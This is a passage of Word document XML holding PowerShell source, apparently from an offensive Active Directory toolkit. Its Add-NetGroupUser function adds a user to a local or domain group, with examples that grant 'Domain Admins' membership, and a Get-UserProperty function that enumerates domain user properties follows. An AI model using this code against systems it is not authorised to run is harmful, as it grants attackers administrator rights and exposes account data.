        <w:t xml:space="preserve">        if permissions allow, utilizing the WinNT service provider and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE134E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        DirectoryServices.AccountManagement, respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB6E19F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1BFA85F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F19869" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7370EBE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain username to query for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E15FAC4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3C421DED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GroupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F82D614" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="695B93F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Group to add the user to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7947FDE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59E4C0AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C01EB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6066131D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Hostname to add the user to, defaults to localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F81CD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="37768399" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A36038" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0EAF23CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain to add the user to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFD590B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="654DF893" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4609B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="48EFF4BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Add-NetGroupUser -UserName john -GroupName Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388D04A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F8362A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Adds a localuser "john" to the local group "Administrators"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1142A547" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="44CB5B3A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48779005" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2DDCE264" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Add-NetGroupUser -UserName john -GroupName "Domain Admins" -Domain dev.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE5D040" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4472EA63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Adds the existing user "john" to the domain group "Domain Admins" in "dev.local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0796A838" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C00E10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="17E84B9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A98AAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1439AAA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035464B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A7B197" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5754DF26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0197DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E2BB1B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4D3E0C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175255A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAC0AAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GroupName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F22A573" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F3230B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73842476" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F77BB6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5E287B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A43AF07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="119E902A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0D4F09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189DD374" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C5D20B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3517E616" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # add the assembly if we need it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E297A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Add-Type -AssemblyName System.DirectoryServices.AccountManagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE0F4AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="34177960" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # if we're adding to a remote host's local group, use the WinNT provider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03981A44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($ComputerName -and ($ComputerName -ne "localhost")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3453A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7938C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Adding user $UserName to $GroupName on host $ComputerName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54841CB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ([ADSI]"WinNT://$ComputerName/$GroupName,group").add("WinNT://$ComputerName/$UserName,user")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E339A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            "[*] User $UserName successfully added to group $GroupName on $ComputerName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321E91B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C8A2D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C2D5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Warning "[!] Error adding user $UserName to group $GroupName on $ComputerName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3104E3B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239F926F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC173D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0785FA8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="39E9C38C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # otherwise it's a local machine or domain add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FFA0E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CCD653" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4146F329" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EB50E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Adding user $UserName to $GroupName on domain $Domain"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338B5BB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $CT = [System.DirectoryServices.AccountManagement.ContextType]::Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0449BB32" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $DomainObject = Get-NetDomain -Domain $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9F267D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if(-not $DomainObject) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43943B2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    return $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AE851D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A356E9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # get the full principal context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE18F5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList $CT, $DomainObject            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E45FF89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E69044F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD726DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # otherwise, get the local machine context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FAAFCC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Adding user $UserName to $GroupName on localhost"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7936F1D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Context = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine, $Env:ComputerName)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE87895" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3066BDE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="708F1ABB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # find the particular group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D016867" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($Context,$GroupName)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0F039E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D0ABA30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # add the particular user to the group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F958B99" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Group.Members.add($Context, [System.DirectoryServices.AccountManagement.IdentityType]::SamAccountName, $UserName)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77191CFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1979D66D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # commit the changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7223D635" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Group.Save()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DD9B73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A16FB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17473FEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Warning "Error adding $UserName to $GroupName : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236C6AC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114800B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124F884E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102CD16F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="226B5289" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A4A28FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-UserProperty {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1335DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E067C30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D6FE8D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57F03B24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns a list of all user object properties. If a property</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3619BEB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        name is specified, it returns all [user:property] values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B5C514" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C5640E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Taken directly from @obscuresec's post:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3404669C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E14B36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="090F169C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E316CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7CEE4574" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Property names to extract for users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEB7FEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7497B2FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABA7277" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5DC6486C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for user properties, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD5478E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0326D0C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032432FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1EC505CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077C7DE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4DF709D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19407D48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5A12EB47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D8DE82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="74DCE14A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BBB956" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="34C1EFFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2064ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CC8B6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A0D9856" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4699D683" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="16C72D12" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
